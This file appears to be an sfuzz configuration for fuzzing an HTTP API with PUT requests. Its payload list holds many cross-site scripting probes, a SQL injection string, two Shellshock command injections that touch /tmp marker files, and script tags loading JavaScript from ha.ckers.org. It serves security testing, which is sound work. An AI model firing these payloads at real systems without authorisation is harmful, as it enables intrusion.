# HTTP fuzzing

#change to the remote host.
# HINT: you can set these from the command line (-D hostname=host.com) rather
#       than modifying this file.
#$hostname=host.com
#$apiuri=/v2.0/routers/remove_router_interface.json
#$formdata={"form-data-field": "value"}

#sequences - sequences are expanded to fill maxseqlen in the buffer.
#Future versions will allow for special formatting options.

sequence={
sequence="{

literal=["foo"]#bar
literal={"foo"
literal=["foo"
literal="FooOne": { "Bar": "no-crash", "Baz": "crash"}}
literal=["\xFF"]
literal=[""]
literal=[""]
literal={"form-id": "' OR 1 == 1--;'"}

literal=() { 0; }; touch /tmp/blns.shellshock1.fail;
literal=() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }
literal=<<< %s(un='%s') = %u
literal=+++ATH0

literal=<script>alert(123)</script>
literal=&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;
literal=<img src=x onerror=alert(123) />
literal=<svg><script>123<1>alert(123)</script>
literal="><script>alert(123)</script>
literal='><script>alert(123)</script>
literal=><script>alert(123)</script>
literal=</script><script>alert(123)</script>
literal=< / script >< script >alert(123)< / script >
literal= onfocus=JaVaSCript:alert(123) autofocus
literal=" onfocus=JaVaSCript:alert(123) autofocus
literal=' onfocus=JaVaSCript:alert(123) autofocus
literal=＜script＞alert(123)＜/script＞
literal=<sc<script>ript>alert(123)</sc</script>ript>
literal=--><script>alert(123)</script>
literal=";alert(123);t="
literal=';alert(123);t='
literal=JavaSCript:alert(123)
literal=;alert(123);
literal=src=JaVaSCript:prompt(132)
literal="><script>alert(123);</script x="
literal='><script>alert(123);</script x='
literal=><script>alert(123);</script x=
literal=" autofocus onkeyup="javascript:alert(123)
literal=' autofocus onkeyup='javascript:alert(123)
literal=<script\x20type="text/javascript">javascript:alert(1);</script>
literal=<script\x3Etype="text/javascript">javascript:alert(1);</script>
literal=<script\x0Dtype="text/javascript">javascript:alert(1);</script>
literal=<script\x09type="text/javascript">javascript:alert(1);</script>
literal=<script\x0Ctype="text/javascript">javascript:alert(1);</script>
literal=<script\x2Ftype="text/javascript">javascript:alert(1);</script>
literal=<script\x0Atype="text/javascript">javascript:alert(1);</script>
literal='`"><\x3Cscript>javascript:alert(1)</script>
literal='`"><\x00script>javascript:alert(1)</script>
literal=ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
literal=ABC<div style="x:expression\x00(javascript:alert(1)">DEF
literal=ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
literal=ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x09expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x20expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x00expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
literal=ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
literal=<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
literal=<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
literal=`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
literal=`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
literal="`'><script>\x3Bjavascript:alert(1)</script>
literal="`'><script>\x0Djavascript:alert(1)</script>
literal="`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
literal="`'><script>\xE2\x80\x81javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x84javascript:alert(1)</script>
literal="`'><script>\xE3\x80\x80javascript:alert(1)</script>
literal="`'><script>\x09javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x89javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x85javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x88javascript:alert(1)</script>
literal="`'><script>\x00javascript:alert(1)</script>
literal="`'><script>\xE2\x80\xA8javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
literal="`'><script>\xE1\x9A\x80javascript:alert(1)</script>
literal="`'><script>\x0Cjavascript:alert(1)</script>
literal="`'><script>\x2Bjavascript:alert(1)</script>
literal="`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
literal="`'><script>-javascript:alert(1)</script>
literal="`'><script>\x0Ajavascript:alert(1)</script>
literal="`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
literal="`'><script>\x7Ejavascript:alert(1)</script>
literal="`'><script>\xE2\x80\x87javascript:alert(1)</script>
literal="`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
literal="`'><script>\xE2\x80\xA9javascript:alert(1)</script>
literal="`'><script>\xC2\x85javascript:alert(1)</script>
literal="`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
literal="`'><script>\xE2\x80\x83javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
literal="`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
literal="`'><script>\xE2\x80\x80javascript:alert(1)</script>
literal="`'><script>\x21javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x82javascript:alert(1)</script>
literal="`'><script>\xE2\x80\x86javascript:alert(1)</script>
literal="`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
literal="`'><script>\x0Bjavascript:alert(1)</script>
literal="`'><script>\x20javascript:alert(1)</script>
literal="`'><script>\xC2\xA0javascript:alert(1)</script>
literal=<img \x00src=x onerror="alert(1)">
literal=<img \x47src=x onerror="javascript:alert(1)">
literal=<img \x11src=x onerror="javascript:alert(1)">
literal=<img \x12src=x onerror="javascript:alert(1)">
literal=<img\x47src=x onerror="javascript:alert(1)">
literal=<img\x10src=x onerror="javascript:alert(1)">
literal=<img\x13src=x onerror="javascript:alert(1)">
literal=<img\x32src=x onerror="javascript:alert(1)">
literal=<img\x47src=x onerror="javascript:alert(1)">
literal=<img\x11src=x onerror="javascript:alert(1)">
literal=<img \x47src=x onerror="javascript:alert(1)">
literal=<img \x34src=x onerror="javascript:alert(1)">
literal=<img \x39src=x onerror="javascript:alert(1)">
literal=<img \x00src=x onerror="javascript:alert(1)">
literal=<img src\x09=x onerror="javascript:alert(1)">
literal=<img src\x10=x onerror="javascript:alert(1)">
literal=<img src\x13=x onerror="javascript:alert(1)">
literal=<img src\x32=x onerror="javascript:alert(1)">
literal=<img src\x12=x onerror="javascript:alert(1)">
literal=<img src\x11=x onerror="javascript:alert(1)">
literal=<img src\x00=x onerror="javascript:alert(1)">
literal=<img src\x47=x onerror="javascript:alert(1)">
literal=<img src=x\x09onerror="javascript:alert(1)">
literal=<img src=x\x10onerror="javascript:alert(1)">
literal=<img src=x\x11onerror="javascript:alert(1)">
literal=<img src=x\x12onerror="javascript:alert(1)">
literal=<img src=x\x13onerror="javascript:alert(1)">
literal=<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
literal=<img src=x onerror=\x09"javascript:alert(1)">
literal=<img src=x onerror=\x10"javascript:alert(1)">
literal=<img src=x onerror=\x11"javascript:alert(1)">
literal=<img src=x onerror=\x12"javascript:alert(1)">
literal=<img src=x onerror=\x32"javascript:alert(1)">
literal=<img src=x onerror=\x00"javascript:alert(1)">
literal=<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
literal=<img src="x` `<script>javascript:alert(1)</script>"` `>
literal=<img src onerror /" '"= alt=javascript:alert(1)//">
literal=<title onpropertychange=javascript:alert(1)></title><title title=>
literal=<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
literal=<!--[if]><script>javascript:alert(1)</script -->
literal=<!--[if<img src=x onerror=javascript:alert(1)//]> -->
literal=<script src="/\%(jscript)s"></script>
literal=<script src="\\%(jscript)s"></script>
literal=<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
literal=<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
literal=<IMG SRC=# onmouseover="alert('xxs')">
literal=<IMG SRC= onmouseover="alert('xxs')">
literal=<IMG onmouseover="alert('xxs')">
literal=<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
literal=<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
literal=<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
literal=<IMG SRC="jav   ascript:alert('XSS');">
literal=<IMG SRC="jav&#x09;ascript:alert('XSS');">
literal=<IMG SRC="jav&#x0A;ascript:alert('XSS');">
literal=<IMG SRC="jav&#x0D;ascript:alert('XSS');">
literal=perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
literal=<IMG SRC=" &#14;  javascript:alert('XSS');">
literal=<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
literal=<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
literal=<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
literal=<<SCRIPT>alert("XSS");//<</SCRIPT>
literal=<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
literal=<SCRIPT SRC=//ha.ckers.org/.j>
literal=<IMG SRC="javascript:alert('XSS')"
literal=<iframe src=http://ha.ckers.org/scriptlet.html <
literal=\";alert('XSS');//
literal=<u oncopy=alert()> Copy me</u>
literal=<i onwheel=alert(1)> Scroll over me </i>
literal=<plaintext>
literal=http://a/%%30%30
literal=</textarea><script>alert(123)</script>

reqwait=1000

#Max size of a subchar sequence to transmit
maxseqlen=4098

endcfg
PUT apiuri HTTP/1.1
Host: hostname
Accept: */*
User-Agent: sfuzz-api-test
Content-Length: %FUZZ
Content-Type: application/x-www-form-urlencoded

FUZZ
--
PUT /FUZZapiuri HTTP/1.1
Host: hostname
Accept: */*
User-Agent: sfuzz-api-test
Content-Length: %FUZZ
Content-Type: application/x-www-form-urlencoded

FUZZ
--
PUT /FUZZapiuri HTTP/1.1
Host: hostname
Accept: */*
User-Agent: sfuzz-api-test
Content-Length: %formdata
Content-Type: application/x-www-form-urlencoded

formdata
--
PUT apiuri?FUZZ HTTP/1.1
Host: hostname
Accept: */*
User-Agent: sfuzz-api-test
Content-Length: 20
Content-Type: application/x-www-form-urlencoded

{"form-id": "value"}
--
